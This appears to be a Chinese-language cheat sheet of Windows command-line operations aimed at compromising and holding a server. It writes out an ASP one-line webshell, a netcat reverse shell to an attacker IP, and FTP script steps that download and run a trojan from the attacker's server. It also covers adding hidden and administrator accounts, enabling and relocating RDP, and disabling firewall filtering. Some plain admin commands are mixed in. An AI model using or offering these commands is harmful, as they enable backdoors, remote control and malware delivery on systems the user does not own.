Windows CMD

Windows常用系统命令

# Windows命令


### 一句话

    echo ^<%eval request("#")%^> > D:\h4ck.asp

### 文件夹操作

    Md hackdir #创建
    Rd hackdir #删除
    Dir c:\    #查看c盘根目录全部文件夹和文件信息
    Tree e:\   #显示e盘文件目录树

### 文本操作

    Type d:\wwwroot\hack.asp 查看一句话木马的内容
    Del d:\wwwroot\hack.asp 删除hack.asp

### nc

    本地  nc -vv -p -l 1234
    服务器 nc -e cmd路径 ip 1234

### 远程桌面端口
 
    1.查询终端3389端口
    REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
    2.开启2003终端
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    3.更改终端端口为2008(0x7d8)
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
    4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
    5.解决终端超出了最大连接数的命令
    mstsc /v:ip:3389 /console
   
    administrator默认不允许，远程的情况下，需将用户加入"Remote Desktop Users"组。
    net user xxx pppp /add &net localgroup administrators xxx /add
    net localgroup administrators xxx /add
    net localgroup "Remote Desktop Users" xxx /add 远程桌面用户允许设置。

### 防火墙
 
    net stop sharedacess关闭防火墙
    net stop PolicyAgent关闭筛选策略
   
    #禁用TCP/IP端口筛选，需重启
    REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
 
### 进程操作

    tasklist /svc #查看进程
    taskkill pid  #关掉进程
    taskkill /im 进程名 /f #关掉进程
    ntsd -c q -p PID 强制结束运行进程
   
### 用户操作

    query user　查询登陆用户
    logoff　ID　　蹬出某用户
    net user 查看所有用户

    net user 1 1 /add
    net1 localgroup administrators 1 /add
   
    net1 user guest /active:yes #启用用户

### 系统权限

    whoami #查看全系统权限

    cacls.exe c:\windows\system32\net.exe /t /e /g everyone:f #调系统权限

### FTP命令行下加账号

    C:\>ftp
    ftp> open 192.168.0.22
    ftp> quote site exec net.exe user admin$ jinwei58 /add
    ftp> quote site exec net.exe localgroup admin$ /add
    200 EXEC command successful (TID=33).

    ftp传马命令
    echo open 自己的FTP > cmd.txt
    echo 帐户>> cmd.txt
    echo 密码>> cmd.txt
    echo binary >> cmd.txt
    echo get 木马.exe >> cmd.txt
    echo bye >> cmd.txt
    ftp -s:cmd.txt
    木马.exe
    del cmd.txt. /q

### 开启 telnet

    @echo off
    sc config tlntsvr start= auto
    net start telnet

### 调整NTFS分区权限

    cacls c: /e /t /g everyone:F  #所有人对c盘都有一切权利
    cacls %systemroot%\system32\*.exe /d everyone #拒绝所有人访问system32中exe文件

### 常用系统命令

    gpedit.msc   #计算机组策略
    compmgmt.msc #计算机管理
    devmgmt.msc  #磁盘管理
    fsmgmt.msc   #共享管理
    lusrmgr.msc  #本地用户管理
    notepad      #写字板

    services.msc #服务管理